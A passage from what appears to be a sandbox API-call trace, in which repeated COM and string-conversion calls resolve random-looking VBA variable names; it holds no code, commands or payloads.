MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e132e, cbMultiByte=7, lpWideCharStr=0x343d44, cchWideChar=8 | out: lpWideCharStr="CukV71") returned 7 [0061.337] ITypeComp:RemoteBind (in: This=0x87cef08, szName="CukV71", lHashVal=0x101162, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xde0 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xde0) returned 0x0 [0061.337] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.337] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e132e | out: _Dst=0x87fcf50) returned 0x0 [0061.338] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080a6e, cbMultiByte=14, lpWideCharStr=0x343d54, cchWideChar=15 | out: lpWideCharStr="_B_var_CukV71") returned 14 [0061.338] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_CukV71", lHashVal=0x108c0b, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.338] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e132e | out: _Dst=0x343dbc) returned 0x0 [0061.338] CRetailMalloc_Free () returned 0x7dc0201 [0061.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1352, cbMultiByte=8, lpWideCharStr=0x343d44, cchWideChar=9 | out: lpWideCharStr="r8jgvzx") returned 8 [0061.339] ITypeComp:RemoteBind (in: This=0x87cef08, szName="r8jgvzx", lHashVal=0x1022b5, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xde2 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xde2) returned 0x0 [0061.339] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.339] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e1352 | out: _Dst=0x87fcf50) returned 0x0 [0061.340] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080a9a, cbMultiByte=15, lpWideCharStr=0x343d54, cchWideChar=16 | out: lpWideCharStr="_B_var_r8jgvzx") returned 15 [0061.340] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_r8jgvzx", lHashVal=0x1016b8, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.340] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e1352 | out: _Dst=0x343dbc) returned 0x0 [0061.340] CRetailMalloc_Free () returned 0x7dc0201 [0061.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1376, cbMultiByte=8, lpWideCharStr=0x343d44, cchWideChar=9 | out: lpWideCharStr="YedHwZu") returned 8 [0061.341] ITypeComp:RemoteBind (in: This=0x87cef08, szName="YedHwZu", lHashVal=0x105b6f, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xde4 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xde4) returned 0x0 [0061.341] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.341] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e1376 | out: _Dst=0x87fcf50) returned 0x0 [0061.341] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080ac6, cbMultiByte=15, lpWideCharStr=0x343d54, cchWideChar=16 | out: lpWideCharStr="_B_var_YedHwZu") returned 15 [0061.341] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_YedHwZu", lHashVal=0x104f72, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.342] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e1376 | out: _Dst=0x343dbc) returned 0x0 [0061.342] CRetailMalloc_Free () returned 0x7dc0201 [0061.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e139a, cbMultiByte=7, lpWideCharStr=0x343d44, cchWideChar=8 | out: lpWideCharStr="t8i1vp") returned 7 [0061.342] ITypeComp:RemoteBind (in: This=0x87cef08, szName="t8i1vp", lHashVal=0x10bf70, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xde6 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xde6) returned 0x0 [0061.342] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.342] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e139a | out: _Dst=0x87fcf50) returned 0x0 [0061.343] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080af2, cbMultiByte=14, lpWideCharStr=0x343d54, cchWideChar=15 | out: lpWideCharStr="_B_var_t8i1vp") returned 14 [0061.343] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_t8i1vp", lHashVal=0x1039da, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.343] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e139a | out: _Dst=0x343dbc) returned 0x0 [0061.343] CRetailMalloc_Free () returned 0x7dc0201 [0061.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e13be, cbMultiByte=10, lpWideCharStr=0x343d44, cchWideChar=11 | out: lpWideCharStr="GPWs3DEJl") returned 10 [0061.344] ITypeComp:RemoteBind (in: This=0x87cef08, szName="GPWs3DEJl", lHashVal=0x105827, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xde8 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xde8) returned 0x0 [0061.344] CRetailMalloc_Alloc () returned 0x8756fc0 [0061.344] _mbscpy_s (in: _Dst=0x8756fc0, _DstSizeInBytes=0xa, _Src=0x56e13be | out: _Dst=0x8756fc0) returned 0x0 [0061.345] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080b1e, cbMultiByte=17, lpWideCharStr=0x343d54, cchWideChar=18 | out: lpWideCharStr="_B_var_GPWs3DEJl") returned 17 [0061.345] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_GPWs3DEJl", lHashVal=0x10616c, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.345] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e13be | out: _Dst=0x343dbc) returned 0x0 [0061.345] CRetailMalloc_Free () returned 0x1a0a0101 [0061.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e140e, cbMultiByte=6, lpWideCharStr=0x343d44, cchWideChar=7 | out: lpWideCharStr="HEvtm") returned 6 [0061.346] ITypeComp:RemoteBind (in: This=0x87cef08, szName="HEvtm", lHashVal=0x109d3a, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdec | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdec) returned 0x0 [0061.346] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.346] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e140e | out: _Dst=0x87fcf50) returned 0x0 [0061.346] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080b4e, cbMultiByte=13, lpWideCharStr=0x343d54, cchWideChar=14 | out: lpWideCharStr="_B_var_HEvtm") returned 13 [0061.347] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_HEvtm", lHashVal=0x106127, wFlags=0x3, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.347] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e140e | out: _Dst=0x343dbc) returned 0x0 [0061.347] CRetailMalloc_Free () returned 0x7dc0201 [0061.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e13e6, cbMultiByte=10, lpWideCharStr=0x343d44, cchWideChar=11 | out: lpWideCharStr="WvGjH2WkJ") returned 10 [0061.347] ITypeComp:RemoteBind (in: This=0x87cef08, szName="WvGjH2WkJ", lHashVal=0x1050c5, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdea | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdea) returned 0x0 [0061.348] CRetailMalloc_Alloc () returned 0x8756fc0 [0061.348] _mbscpy_s (in: _Dst=0x8756fc0, _DstSizeInBytes=0xa, _Src=0x56e13e6 | out: _Dst=0x8756fc0) returned 0x0 [0061.348] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080b7a, cbMultiByte=17, lpWideCharStr=0x343d54, cchWideChar=18 | out: lpWideCharStr="_B_var_WvGjH2WkJ") returned 17 [0061.348] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_WvGjH2WkJ", lHashVal=0x104a89, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.348] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e13e6 | out: _Dst=0x343dbc) returned 0x0 [0061.348] CRetailMalloc_Free () returned 0x1a0a0101 [0061.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1432, cbMultiByte=6, lpWideCharStr=0x343d44, cchWideChar=7 | out: lpWideCharStr="xDq1Q") returned 6 [0061.349] ITypeComp:RemoteBind (in: This=0x87ce890, szName="xDq1Q", lHashVal=0x10d66d, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x0, pDummy=0xdee | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x0, pDummy=0xdee) returned 0x0 [0061.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1432, cbMultiByte=6, lpWideCharStr=0x343d44, cchWideChar=7 | out: lpWideCharStr="xDq1Q") returned 6 [0061.349] ITypeComp:RemoteBind (in: This=0x87ce668, szName="xDq1Q", lHashVal=0x10d66d, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x1, pDummy=0xdee | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x1, pDummy=0xdee) returned 0x0 [0061.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1432, cbMultiByte=6, lpWideCharStr=0x343d44, cchWideChar=7 | out: lpWideCharStr="xDq1Q") returned 6 [0061.349] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="xDq1Q", lHashVal=0x10d66d, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x2, pDummy=0xdee | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x2, pDummy=0xdee) returned 0x0 [0061.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1432, cbMultiByte=6, lpWideCharStr=0x343d44, cchWideChar=7 | out: lpWideCharStr="xDq1Q") returned 6 [0061.350] ITypeComp:RemoteBind (in: This=0x87cef08, szName="xDq1Q", lHashVal=0x10d66d, wFlags=0x3, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdee | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdee) returned 0x0 [0061.350] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.350] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x6, _Src=0x56e1432 | out: _Dst=0x87fcf50) returned 0x0 [0061.350] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080baa, cbMultiByte=13, lpWideCharStr=0x343d54, cchWideChar=14 | out: lpWideCharStr="_B_var_xDq1Q") returned 13 [0061.350] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_xDq1Q", lHashVal=0x109a5a, wFlags=0x3, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.351] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x6, _Src=0x56e1432 | out: _Dst=0x343dbc) returned 0x0 [0061.351] CRetailMalloc_Free () returned 0x7dc0201 [0061.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1456, cbMultiByte=8, lpWideCharStr=0x343d44, cchWideChar=9 | out: lpWideCharStr="VuAn780") returned 8 [0061.351] ITypeComp:RemoteBind (in: This=0x87cef08, szName="VuAn780", lHashVal=0x104014, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdf0 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdf0) returned 0x0 [0061.351] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.351] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e1456 | out: _Dst=0x87fcf50) returned 0x0 [0061.352] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080bd6, cbMultiByte=15, lpWideCharStr=0x343d54, cchWideChar=16 | out: lpWideCharStr="_B_var_VuAn780") returned 15 [0061.352] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_VuAn780", lHashVal=0x104398, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.352] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e1456 | out: _Dst=0x343dbc) returned 0x0 [0061.352] CRetailMalloc_Free () returned 0x7dc0201 [0061.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e147a, cbMultiByte=8, lpWideCharStr=0x343d44, cchWideChar=9 | out: lpWideCharStr="WZ0QfKL") returned 8 [0061.353] ITypeComp:RemoteBind (in: This=0x87cef08, szName="WZ0QfKL", lHashVal=0x10a527, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdf2 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdf2) returned 0x0 [0061.353] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.353] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e147a | out: _Dst=0x87fcf50) returned 0x0 [0061.354] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080c02, cbMultiByte=15, lpWideCharStr=0x343d54, cchWideChar=16 | out: lpWideCharStr="_B_var_WZ0QfKL") returned 15 [0061.354] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_WZ0QfKL", lHashVal=0x10992a, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.354] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e147a | out: _Dst=0x343dbc) returned 0x0 [0061.354] CRetailMalloc_Free () returned 0x7dc0201 [0061.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e149e, cbMultiByte=7, lpWideCharStr=0x343d44, cchWideChar=8 | out: lpWideCharStr="j4hyGv") returned 7 [0061.355] ITypeComp:RemoteBind (in: This=0x87cef08, szName="j4hyGv", lHashVal=0x108d5f, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdf4 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdf4) returned 0x0 [0061.355] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.355] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e149e | out: _Dst=0x87fcf50) returned 0x0 [0061.356] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080c2e, cbMultiByte=14, lpWideCharStr=0x343d54, cchWideChar=15 | out: lpWideCharStr="_B_var_j4hyGv") returned 14 [0061.356] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_j4hyGv", lHashVal=0x1007c9, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.356] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e149e | out: _Dst=0x343dbc) returned 0x0 [0061.356] CRetailMalloc_Free () returned 0x7dc0201 [0061.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e14c2, cbMultiByte=10, lpWideCharStr=0x343d44, cchWideChar=11 | out: lpWideCharStr="kpXfvudhW") returned 10 [0061.357] ITypeComp:RemoteBind (in: This=0x87cef08, szName="kpXfvudhW", lHashVal=0x103716, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdf6 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdf6) returned 0x0 [0061.357] CRetailMalloc_Alloc () returned 0x8756fc0 [0061.357] _mbscpy_s (in: _Dst=0x8756fc0, _DstSizeInBytes=0xa, _Src=0x56e14c2 | out: _Dst=0x8756fc0) returned 0x0 [0061.357] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080c5a, cbMultiByte=17, lpWideCharStr=0x343d54, cchWideChar=18 | out: lpWideCharStr="_B_var_kpXfvudhW") returned 17 [0061.357] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_kpXfvudhW", lHashVal=0x10405b, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.358] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0xa, _Src=0x56e14c2 | out: _Dst=0x343dbc) returned 0x0 [0061.358] CRetailMalloc_Free () returned 0x1a0a0101 [0061.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e14ea, cbMultiByte=8, lpWideCharStr=0x343d44, cchWideChar=9 | out: lpWideCharStr="AMyaCXs") returned 8 [0061.358] ITypeComp:RemoteBind (in: This=0x87cef08, szName="AMyaCXs", lHashVal=0x1017c2, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdf8 | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdf8) returned 0x0 [0061.358] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.358] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, _Src=0x56e14ea | out: _Dst=0x87fcf50) returned 0x0 [0061.359] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080c8a, cbMultiByte=15, lpWideCharStr=0x343d54, cchWideChar=16 | out: lpWideCharStr="_B_var_AMyaCXs") returned 15 [0061.359] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_AMyaCXs", lHashVal=0x100bc5, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.359] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x8, _Src=0x56e14ea | out: _Dst=0x343dbc) returned 0x0 [0061.359] CRetailMalloc_Realloc () returned 0x76fceb0 [0061.359] CRetailMalloc_Free () returned 0x7dc0201 [0061.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e150e, cbMultiByte=7, lpWideCharStr=0x343d44, cchWideChar=8 | out: lpWideCharStr="Rv0yVK") returned 7 [0061.360] ITypeComp:RemoteBind (in: This=0x87cef08, szName="Rv0yVK", lHashVal=0x101db3, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdfa | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdfa) returned 0x0 [0061.360] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.360] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x7, _Src=0x56e150e | out: _Dst=0x87fcf50) returned 0x0 [0061.361] IUnknown:Release (This=0x87ce888) returned 0x9 [0061.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb080cb6, cbMultiByte=14, lpWideCharStr=0x343d54, cchWideChar=15 | out: lpWideCharStr="_B_var_Rv0yVK") returned 14 [0061.361] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_Rv0yVK", lHashVal=0x10985c, wFlags=0x5, ppTInfo=0x343d20, pDescKind=0x343d30, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0, pDummy=0x1 | out: ppTInfo=0x343d20*=0x0, pDescKind=0x343d30*=0, ppFuncDesc=0x343d24, ppVarDesc=0x884dc24, ppTypeComp=0x343eb0*=0x0, pDummy=0x1) returned 0x0 [0061.361] _mbscpy_s (in: _Dst=0x343dbc, _DstSizeInBytes=0x7, _Src=0x56e150e | out: _Dst=0x343dbc) returned 0x0 [0061.361] CRetailMalloc_Free () returned 0x7dc0201 [0061.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56e1532, cbMultiByte=8, lpWideCharStr=0x343d44, cchWideChar=9 | out: lpWideCharStr="XqKkudh") returned 8 [0061.362] ITypeComp:RemoteBind (in: This=0x87cef08, szName="XqKkudh", lHashVal=0x10690e, wFlags=0x5, ppTInfo=0x343d10, pDescKind=0x343d20, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdfc | out: ppTInfo=0x343d10*=0x0, pDescKind=0x343d20*=0, ppFuncDesc=0x343d14, ppVarDesc=0x343eb0, ppTypeComp=0x4, pDummy=0xdfc) returned 0x0 [0061.362] CRetailMalloc_Alloc () returned 0x87fcf50 [0061.362] _mbscpy_s (in: _Dst=0x87fcf50, _DstSizeInBytes=0x8, 